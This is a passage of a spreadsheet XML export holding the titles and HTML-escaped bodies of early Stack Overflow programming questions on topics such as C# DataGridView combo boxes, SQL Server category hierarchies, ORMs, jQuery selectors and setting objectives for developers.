&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Somehow, i need to escape all meaningful characters from the string, then i need to replace glob * and ? characters with apropriate regexp syntax. What is the most convinient way to do this? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is SQL the assembly for databases?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Talking about hibernate and others ORMs, the ORMs evangelists talk about SQL like the assembly language for Databases.&lt;/p&gt;
&lt;p&gt;I think is soon to assert this, but I guess can be true on a near future, not sure.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; The analogy I was referring means &lt;em&gt;SQL&lt;/em&gt; is to &lt;em&gt;assembly&lt;/em&gt; what &lt;em&gt;ORM&lt;/em&gt; is to &lt;em&gt;C/Java/C#&lt;/em&gt;. Of course, an exact analogy is not possible. The question is if in the future, with more powerful computers the developers are going to use only &lt;em&gt;ORM&lt;/em&gt; (or ORM like) instead of &lt;em&gt;SQL&lt;/em&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an easy way to send SCSI passthrough on OSX using native python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On Windows I am able to sent SCSI passthrough to devices using win32file.DeviceIOControl(..), on UN*X I can do it using fnctl.ioctl(...).&lt;/p&gt;
&lt;p&gt;I have been searching for something equivalent in OSX that would allow me to send the IOCTL commands using only native python.&lt;/p&gt;
&lt;p&gt;I would to send commands to hard drives specifically, not USB devices.&lt;/p&gt;
&lt;p&gt;Is there anyway to do it without writing a Kernel Extension or any other code using only standard python libraries? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is Long.valueOf(0).equals(Integer.valueOf(0)) false?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This questions is prompted by &lt;a href="http://stackoverflow.com/questions/444638/strange-hashmap-put-behaviour#444757"&gt;http://stackoverflow.com/questions/444638/strange-hashmap-put-behaviour#444757&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I think I understand why &lt;code&gt;Map&amp;lt;K,V&amp;gt;.put&lt;/code&gt; takes a &lt;code&gt;K&lt;/code&gt; but &lt;code&gt;Map&amp;lt;K,V&amp;gt;.get&lt;/code&gt; takes an &lt;code&gt;Object&lt;/code&gt;, it seems not doing so will break too much existing code. &lt;/p&gt;
&lt;p&gt;Now we get into a very error-prone scenario:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;java.util.HashMap&amp;lt;Long, String&amp;gt; m = new java.util.HashMap&amp;lt;Long, String&amp;gt;();
m.put(5L,"Five"); // compiler barfs on m.put(5, "Five")
m.contains(5); // no complains from compiler, but returns false
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Couldn't this have been solved by returning true if the &lt;code&gt;Long&lt;/code&gt; value was withing &lt;code&gt;int&lt;/code&gt; range and the values are equal?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Resizing a Webbrowser control hosted by an Explorer Bar in IE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am very new to windows programming so bare with me.&lt;/p&gt;
&lt;p&gt;I have a custom explorer bar (a band object) that hosts a webbrowser control. I can initialize the WebBrowser control properly and have it display web pages.&lt;/p&gt;
&lt;p&gt;However, I've noticed that when I resize the explorer bar, &lt;b&gt;the webbrowser control doesn't resize appropriately&lt;/b&gt; to the size of the bar:&lt;/p&gt;
&lt;p&gt;&lt;br&gt;
&lt;b&gt;Before Resize:&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="http://farm4.static.flickr.com/3347/3198030477_abd73d020b.jpg" alt="Before Resize" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;After Resize:&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="http://farm4.static.flickr.com/3482/3198030475_952eceb19d.jpg" alt="After Resize" /&gt;&lt;/p&gt;
&lt;p&gt;I'm not sure what events I need to handle and what can resize the browser control. I have some experience in .NET programming, and none really in Windows programming.&lt;/p&gt;
&lt;p&gt;I've also included my source code &lt;a href="http://rapidshare.com/files/183531789/ExplrBar.Cpp" rel="nofollow"&gt;here&lt;/a&gt; if you would like to poke aorund it more.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS two divs next to each other</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to put two &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt;s next to each other. The right &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; is about 200px; and the left &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; must fill up the rest of the screen width? How can I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Moving an arbitrary setting to a toolbar in Visual Studio</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to be able to modify a certain setting of Visual Studio right from the toolbar. 
Specifically, the number of parallel builds (Tools | Options | Projects and Solutions | Build and Run | maximum number of parallel project builds).
It can be either an edit box right on the toolbar or two buttons setting it to certain values.&lt;/p&gt;
&lt;p&gt;I use Visual Studio 2005.&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>multiple description coding</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I encode an h264 video to be MDC (multiple description coding)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# compiler and caching of local variables</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Oops - as rightly pointed out, there'd be no way to know whether the constructor for the class in question is sensitive to when or how many times it is called, or whether the object's state is changed during the method, so it would have to be created from scratch each time. Ignore the Dictionary and just consider delegates created in-line during the course of a method :-)&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Say I have the following method with Dictionary of Type to Action local variable.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void TakeAction(Type type)
{
    // Random types chosen for example.
    var actions = new Dictionary&amp;lt;Type, Action&amp;gt;()
    {
        {typeof(StringBuilder), () =&amp;gt;
            {
                // ..
            }},
         {typeof(DateTime), () =&amp;gt;
            {
                // ..
            }}
    };
    actions[type].Invoke();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The Dictionary will always be the same when the method is called. Can the C# compiler notice this, only create it once and cache it somewhere for use in future calls to the method? Or will it simply be created from scratch each time? I know it could be a field of the containing class, but it seems neater to me for a thing like this to be contained in the method that uses it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to add summary tags to a generated webservice proxy class?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Aloha&lt;/p&gt;
&lt;p&gt;I'm referencing an external webservice in my .NET 2.0 application. Adding a service reference generated a nice proxy class for me. I'd like to add &lt;code&gt;///&amp;lt;summary&amp;gt;&lt;/code&gt; style documentation to this. If the service reference is updated, all my shiny comments are gone.&lt;/p&gt;
&lt;p&gt;Is there any solution to this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I replace the contents of an existing XML file in C#.NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When trying to replace the content of an XML file in C#.NET with a snippet like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string file = Path.GetTempFileName(); // pretend this is a real file
string tmpFile = Path.GetTempFileName();
using (var writer = XmlWriter.Create(File.Create(tmpFile)))
{
    writer.WriteStartElement("root");
    for (int i = 0; i &amp;lt; 100; i++)
    {
        writer.WriteElementString("test", null, 
            "All work and no play makes Jack a dull boy");
    }
    writer.WriteEndElement();
}
File.Delete(file);
File.Move(tmpFile, file);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... I get a System.IO.IOException claiming that the file is already opened by another process.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to detect IIS version using C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to detect IIS version using C#?&lt;/p&gt;
&lt;p&gt;Update:
I meant from a winapp (actually the scenario is developing a custom installer that wants to check the version of the installed IIS to call the appropriate api's)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DataGridViewComboBoxColumn</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two &lt;code&gt;DataGridViewComboBoxColumn&lt;/code&gt; that I add at run time. I need the items of the first  &lt;code&gt;DataGridViewComboBoxColumn&lt;/code&gt; to stay the same in all the rows of the &lt;code&gt;GridView&lt;/code&gt; but I want the items of the second &lt;code&gt;DataGridViewComboBoxColumn&lt;/code&gt; to be different from row to another depending on the selected item of the first &lt;code&gt;DataGridViewComboBoxColumn&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If we say the first &lt;code&gt;DataGridViewComboBoxColumn&lt;/code&gt; represents the locations and the second &lt;code&gt;DataGridViewComboBoxColumn&lt;/code&gt; represents the sublocations. So, I want the second &lt;code&gt;DataGridViewComboBoxColumn&lt;/code&gt; items to be the sublocations of the selected location from the first &lt;code&gt;DataGridViewComboBoxColumn&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Like this if &lt;code&gt;Canada&lt;/code&gt; is selected&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;Country(comboBoxItems)  |     State/Province(ComboBox Items)
USA                           Quebec
CANADA(selected)              Ontario
ENGLAND                       Manitoba
                              Alberta
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then if you select &lt;code&gt;USA&lt;/code&gt;&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;Country(comboBoxItems)  |     State/Province(ComboBox Items)
USA (Selected)                California
CANADA                        New York
ENGLAND                       Montana
                              Ohio
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is it possible to define &lt;configSections&gt; in a dependent dll's application config</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a custom .NET addin for an application and I am trying to create configSections for the addin's config file. The trouble is I am not able to read that section If load the configuration using the OpenMapperExeConfiguration/OpenExeConfiguration.&lt;/p&gt;
&lt;p&gt;Here is my config file(MyTest.dll.config)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;configuration&amp;gt;
  &amp;lt;configSections&amp;gt;
    &amp;lt;section name="test" type="MyTest, Test.ConfigRead"/&amp;gt;
    &amp;lt;/configSections&amp;gt;
    &amp;lt;test&amp;gt;
    		..Stuff here
    	&amp;lt;/test&amp;gt;
    &amp;lt;appSettings&amp;gt;
    	&amp;lt;add key="uri" value="www.cnn.com"/&amp;gt;
    &amp;lt;/appSettings&amp;gt;
&amp;lt;/configuration&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is my code sample to access the test configSection&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ExeConfigurationFileMap fileMap = new ExeConfigurationFileMap();  
fileMap.ExeConfigFilename = Assembly.GetExecutingAssembly().Location + "config";    
Configuration applicationConfig = ConfigurationManager.OpenMappedExeConfiguration(fileMap,ConfigurationUserLevel.None);
//Using OpenExeConfiguration doesnt help either.
//Configuration applicationConfig = ConfigurationManager.OpenExeConfiguration(Assembly.GetExecutingAssembly().Location);
//Accessing test section
applicationConfig.GetSection("test");
//Accessing AppSettings works fine.
AppSettingsSection appSettings = (AppSettingsSection)applicationConfig.GetSection("appSettings");
appSettings.Settings["uri"].Value;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As shown appsettings value can be read just fine. Is it possible to have configSections in any other config other than the main application's config file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to populate each DataGridViewComboBoxCell with different data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i have two DataGridViewComboBoxColumn that i add at run time i need the items of the first DataGridViewComboBoxColumn to stay the same in all the rows of the gridview but i want the items of the second DataGridViewComboBoxColumn to be different from row to the other depending on the selected item of the first DataGridViewComboBoxColumn&lt;/p&gt;
&lt;p&gt;if we say the first DataGridViewComboBoxColumn represents the locations and the second DataGridViewComboBoxColumn to represent the sublocations. so i want the second DataGridViewComboBoxColumn items to be the sublocations of the selected location from the first DataGridViewComboBoxColumn &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good way to make a repeating template for data in asp.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building a webpage on which I display the &lt;em&gt;n&lt;/em&gt; newest newsposts on the front page, and this is the method that gets the posts and returns them to the .aspx-file. I use a asp:substitution-control to insert the string into the webpage.&lt;/p&gt;
&lt;p&gt;I think my way of doing this i kind of messy and ugly, and not very flexible if i want to do little changes on the template. Is there any way for me to achieve what i want while having the template itself in a separate .aspx or .ascx file? I've tried, but cant come up with a smart way of handing the data onto the template-file.&lt;/p&gt;
&lt;p&gt;Plus, when (if?) i've put the template in a separate file - how do i repeat it within another .aspx-file (within a contentplaceholder, if that matters. The layout is controlled by a master-page) with different values for each instance?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static string getShortPosts(int postNumber)
{
    DbConnection d = new DbConnection();
    DataTable tbl = d.selectQuery("SELECT TOP (" + postNumber + ") news.id, news.title, news.newsContent, news.excerpt, news.date, news.userid, news.urlTitle, " +
                                    "news.isPublished, users.firstName, users.lastName FROM news INNER JOIN users ON news.userid = users.userid " +
                                    "ORDER BY id DESC;");
    DataTableReader r = tbl.CreateDataReader();
    StringBuilder s = new StringBuilder("");
    while (r.Read())
    {
        /* THIS */ 
        s.Append(
            "&amp;lt;div class=\"newsBox\"&amp;gt;" + System.Environment.NewLine +
            "&amp;lt;h2&amp;gt;" + r["title"]+ "&amp;lt;/h2&amp;gt;" + System.Environment.NewLine +
            "&amp;lt;p&amp;gt;" + r["excerpt"] + "&amp;lt;/p&amp;gt;" + System.Environment.NewLine +
            "&amp;lt;/div&amp;gt;" +System.Environment.NewLine+System.Environment.NewLine
            );
    }
    return s.ToString();
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is there any defined atom syndication xml schema?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any defined atom syndication xml schema?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Having to set objectives for developers, even though objectives don't work</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It is &lt;a href="http://www.joelonsoftware.com/news/20020715.html"&gt;generally accepted&lt;/a&gt; that &lt;a href="http://www.inc.com/magazine/20081001/how-hard-could-it-be-sins-of-commissions.html"&gt;setting measurable objectives&lt;/a&gt; for software developers &lt;a href="http://stackoverflow.com/questions/324399/what-is-a-fair-productivity-measurement-technique-for-programmers#324441"&gt;doesn't work&lt;/a&gt; , as too much focus on the objectives can lead to behaviour counter to the organisational goals (so-called "&lt;a href="http://csdl.ics.hawaii.edu/techreports/96-16/96-16.html"&gt;measurement dysfunction&lt;/a&gt;").&lt;/p&gt;
&lt;p&gt;However, in my company, we are required to set objectives for all staff, and are encouraged by Human Resources to make them &lt;a href="http://en.wikipedia.org/wiki/SMART_(project_management)"&gt;SMART&lt;/a&gt;.  In the past, my fellow first-level managers (team leads) and I have tried a number of approaches:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Set measurable objectives that are additional to the normal job, like "Do training on technology X", "Create documentation for piece of code Y that no-one understands" and so on.  When it comes to the annual performance evaluation, rate developers not on the written objectives, but rather on my opinion of the unmeasurable value of their normal work, since that is actually what the company cares about.&lt;/li&gt;
&lt;li&gt;Set very specific objectives like "days' work done as recorded by the task management system", "number of bugs introduced", "number of production issued caused".  This led to inflated estimates and incorrect classification of bugs, in order to achieve better "scores".  Interestingly, even those developers scoring highly on this system didn't like it, as the intrinsic trust within the team was damaged and they didn't always feel they deserved their high position.&lt;/li&gt;
&lt;li&gt;Set vague objectives that are variants on "Do your normal job well".  When it comes to the annual evaluation, their rating does reflect performance against the objectives, but the objectives themselves are not measurable or achievable, which is frowned upon.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;None of these is ideal.  If you have been in a similar situation of having to create meaningful, measurable objectives for software developers in spite of the evidence against their effectiveness, &lt;strong&gt;what approach has worked best for you?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr&gt;&lt;/p&gt;
&lt;p&gt;Related questions I found that don't quite address the same point:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/51629/what-are-suitable-performance-indicators-for-programmers"&gt;What are some good performance goals for a software engineer?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/210329/setting-performance-goals-for-developers"&gt;Setting Performance goals for Developers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/51629/what-are-suitable-performance-indicators-for-programmers"&gt;What are suitable performance indicators for programmers?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/324399/what-is-a-fair-productivity-measurement-technique-for-programmers#324441"&gt;What is a fair productivity measurement technique for programmers?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/317836/i-need-some-career-goals-for-the-next-year"&gt;I need some career â€œGoalsâ€ for the next year&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;hr&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt; (18 November 2009): There are 10 upvotes for my question, and the highest-rated answers only have 4 upvotes (including one each from me).  I think this tells us something: perhaps that Joel and the others are right, and that the combined wisdom of stackoverflow cannot come up with &lt;em&gt;any&lt;/em&gt; compelling, measurable objectives for developers that could not be gamed without adversely affecting the true (unmeasurable) value of their work.  Thanks for trying though!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to submit multiple models on rails using flex?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to submit a create and update request to rails using flex with multiple models. For example, imagine that we have a blog post and multiple comments.&lt;/p&gt;
&lt;p&gt;The user comes and update the post and some comments, when he clicks on submit I want to send all updates.&lt;/p&gt;
&lt;p&gt;If I send something like:&lt;/p&gt;
&lt;p&gt;var params:Object = new Object();&lt;/p&gt;
&lt;p&gt;params["post[text]"] = myPostText;&lt;/p&gt;
&lt;p&gt;params["post[userid]"] = myPostUserId;&lt;/p&gt;
&lt;p&gt;Then I can send a array with the comments:
var ar:Array = ["comment 1", "comment 2"];
params["post[comments]"] = ar;&lt;/p&gt;
&lt;p&gt;This work without problems (avoiding the problem with multiple attributes having the same name).&lt;/p&gt;
&lt;p&gt;But my problem is that for the comments I need to submit multiple attributes, lets suppose that for each comment I need to submit a rank, I tried to do (pseudo code):&lt;/p&gt;
&lt;p&gt;var ar:Array = new Array();&lt;/p&gt;
&lt;p&gt;for each comment c {&lt;/p&gt;
&lt;p&gt;ar.push({"text":c.text, "rank":c.rank});&lt;/p&gt;
&lt;p&gt;}&lt;/p&gt;
&lt;p&gt;params["post[comments]"] = ar;&lt;/p&gt;
&lt;p&gt;This does not work, because for each comment the hash parameters on rails side will contain the string "[object Object]".&lt;/p&gt;
&lt;p&gt;Does anyone know a way to submit multiple models on flex to rails?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dealing with variable category hierarchies</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The issue I have is as follows:  My company's supplier gives us an Access database (which I import into SQL Server) containing their product information (the alternative is to use XML), and I'm trying to massage this into a more usable format for use in an e-commerce website.&lt;/p&gt;
&lt;p&gt;The problem I run into, and maybe I'm just not thinking clearly, is that their category information can be anywhere from 3-6 subcategories deep; there are always at least 2 categories (a top-level Parent category and a more specific subcategory) but there can be up to 6 depending on the item.&lt;/p&gt;
&lt;p&gt;Their data is provided to me in the following table structure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE [dbo].[ECDB2_HIERARCHY](
    [SEQ_ID] [int] NOT NULL,
    [PFX_NUM] [nvarchar](3) NOT NULL,
    [STK_NUM] [nvarchar](12) NOT NULL,
    [ECDB2_LVL_1] [nvarchar](max)  NULL,
    [ECDB2_LVL_1_ID] [int] NULL,
    [ECDB2_LVL_2] [nvarchar](max) NULL,
    [ECDB2_LVL_2_ID] [int] NULL,
    [ECDB2_LVL_3] [nvarchar](max) NULL,
    [ECDB2_LVL_3_ID] [int] NULL,
    [ECDB2_LVL_4] [nvarchar](max) NULL,
    [ECDB2_LVL_4_ID] [int] NULL,
    [ECDB2_LVL_5] [nvarchar](max) NULL,
    [ECDB2_LVL_5_ID] [int] NULL,
    [ECDB2_LVL_6] [nvarchar](max) NULL,
    [ECDB2_LVL_6_ID] [int] NULL
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For the most part I can ignore SEQ_ID as it's not used; PFX_NUM and STK_NUM get concatenated together to form the product's SKU, but that's not the issue.  I need to be able to dynamically traverse categories from the site.  For instance, given the following row:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;SEQ_ID: 364867 (ignored)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;PFX_NUM: AMP&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;STK_NUM: 73121&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ECDB2_LVL_1: Office Supplies&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ECDB2_LVL_1_ID 11&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ECDB2_LVL_2: Envelopes, Mailers &amp;amp; Shipping Supplies&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ECBD2_LVL_2_ID: 26&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ECDB2_LVL_3: Envelopes&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ECDB2_LVL_3_ID: 195&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ECDB2_LVL_4: Business Letter Envelopes&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ECDB2_LVL_4_ID: 795&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ECDB2_LVL_5: (empty)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ECDB2_LVL_5_ID: 0&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ECDB2_LVL_6: (empty)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ECDB2_LVL_6_ID: 0&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The user should be able to navigate through the levels, but what throws me off is the sample website provided with the data (see below) displays all items under a subcategory at random intervals... it looks like it's at the 3rd level (ecdb2_lvl_3) but for items that don't have the 3rd level it displays starting at the 2nd.  As you can see from the schema, they have it all together in one table that lists the products AND all of the categories they belong to, instead of something like a self-referencing categories table and then a joining products table.&lt;/p&gt;
&lt;p&gt;The problem is that some items only have 2 levels, some like this one have up to 4, and there are a few that have all 6 - the vendor's sample website, available at &lt;a href="http://www.biggestbook.com" rel="nofollow"&gt;http://www.biggestbook.com&lt;/a&gt; does a good job of what I want, but I don't have access to their code so I'm left scratching my head as to how exactly they are pulling back categories and traversing them.  I'm assuming they have some kind of global flag to indicate what level you're currently at (e.g. 1 for Office Supplies, 2 for Envelopes et all, and so on) so they can keep track of what your current depth is, and then check each sub-level to see if there are more subcategories to show, but I'm drawing a blank when I think of how to handle this efficiently.  Their naming scheme leaves a lot to be desired, as well, but that's something I can tackle later if need be.&lt;/p&gt;
&lt;p&gt;Anyone have advice in how to tackle this issue?  I'm planning the store in C#/ASP.NET (possibly MVC, possibly not) so C# examples would be most useful, but I can follow most languages easy enough to figure it out.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>best way to show several images on a winform in c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;best way to show several images on a winform in c#?  Datagrid?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>sql server bcp xml data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi
I have a table which has a column which is of type xml.
I have to extract data from this table and load the data into another environment.
i am using bcp to extract and laod the target table but there are some special characters that is causing some issues when i bcp them into the target table. are there any workarounds&lt;/p&gt;
&lt;p&gt;thanks
Ben&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Matching exact string with JavaScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I test if a RegEx matches a string &lt;em&gt;exactly&lt;/em&gt;?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var r = /a/;
r.test("a"); // returns true
r.test("ba"); // returns true
testExact(r, "ba"); // should return false
testExact(r, "a"); // should return true
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>VB6 ListBox Click and DblClick</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a need to run different code when a user clicks or double-clicks an item in a VB6 ListBox control. When I click on the control, the Click event handler executes. However, I am finding that when I double-click on the control, both the Click and DblClick event handlers execute.&lt;/p&gt;
&lt;p&gt;Anyone have a good solution for getting just the DblClick event handler code to run without the Click code being executed first?&lt;/p&gt;
&lt;p&gt;Thanks in advance for any suggestions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I change the input behaviour of a DateTimePicker control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The default input behaviour of the DateTimePicker when entering a date is like this:&lt;/p&gt;
&lt;p&gt;YYYY(Right Arrow)MM(Right Arrow)DD&lt;/p&gt;
&lt;p&gt;The user want to enter the date like this:&lt;/p&gt;
&lt;p&gt;YYYYMMDD&lt;/p&gt;
&lt;p&gt;Is there any simple way of modifying the input behaviour of the DateTimePicker so that is does behave like the user want it to?&lt;/p&gt;
&lt;p&gt;TIA&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP If Date Is &gt;13 Days Ago</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm pulling a row from a database and there is a date field (y-m-d). I need to create an if statement so that I can do something IF that date is longer then 13 days ago. I've already found out how to display all results which are longer then 13 days ago if it is any help.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM links WHERE (TO_DAYS(NOW()) - TO_DAYS(date))&amp;gt;13
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any help would be greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Rather difficult mySQL problem </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A friend of mine is having an problem with an big mySQL database and quite a big number of repeating columns over multiple tables.&lt;/p&gt;
&lt;p&gt;To describe the problem better, the database serves multiple services like FTP, Postfix, webmail, pretty much all the common services you would be running on a general use Linux server and all of these services are using this database. The problem is that most of the services don't know how to read from multiple tables, so if you use multiple tables entries like username, pasword, switches must be repeated in those service specific tables.
hing 
Ex. UserProfile Table conains all user relevant data. (Username, Password)
    ACL Table Contains Access related data (AccountEnabled, FTPEnabled, AccessType)
    FTP Table contains FTP related data (Quota, directories etc)
I think you get the picture...
So if i need the ftp service I must read the UserProfile Table, The ACL Table and the FTP Table, but since I can't read from multiple tables, I only read the ftp table where I've duplicate the fields I need such as UserName, Password and FTPEnabled. &lt;/p&gt;
&lt;p&gt;Now they are trying to create an application to administer all these services, you can imagine that this has been done by hand till now, and the server is serving more than a few hundred users. So, now they are trying to create a administrative interface that manages all those tables. The problem is that 30% of the that must be written is duplicate data.
Ex. Username and Password must be written 6 times in different Tables.&lt;/p&gt;
&lt;p&gt;Is there a possibility to create a Table with "Symlink" or something similar?
So that you have all the data in one Temp Table that is accessible to all services and dynamically updated. Or is there any other "smart" way, you can think of, to make all of this easier?&lt;/p&gt;
&lt;p&gt;Thank you in advance for your time,
titel&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I modify multicast TCP/IP packets' TTL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm supporting a 3rd party app that sends multicast packets with a TTL of 1.  We cannot modify the app, but need a higher TTL to route the packets to another customer's network. Is there a network appliance or windows (server 2003) app that will let me modify this?  &lt;/p&gt;
&lt;p&gt;Is there a better approach for connecting the sender and receiver in this scenario?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the recommended workaround if numeric_limits&lt;double&gt;::has_infinity is false?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to check a double value for infinity in a C++ app on Linux. On most platforms this works by comparing with &lt;code&gt;std::numeric_limits&amp;lt;double&amp;gt;::infinity()&lt;/code&gt;. However, on some old platforms (RedHat 9 for example, with gcc 3.2.2) this is not available, and &lt;code&gt;std::numeric_limits&amp;lt;double&amp;gt;::has_infinity&lt;/code&gt; is false there.&lt;/p&gt;
&lt;p&gt;What workaround would you recommend for those platforms?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I find all tables cells which only contain a non breaking space with jQuery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to only find the cells in the table which contain &lt;code&gt;&amp;amp;nbsp;&lt;/code&gt; using jQuery. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;table&amp;gt;
      &amp;lt;tr&amp;gt;
           &amp;lt;td&amp;gt;&amp;amp;nbsp;&amp;lt;/td&amp;gt;
           &amp;lt;td&amp;gt;Something&amp;lt;/td&amp;gt;
           &amp;lt;td&amp;gt;something else&amp;lt;/td&amp;gt;
           &amp;lt;td&amp;gt;&amp;amp;nbsp;&amp;lt;/td&amp;gt;
     &amp;lt;/tr&amp;gt;
    &amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
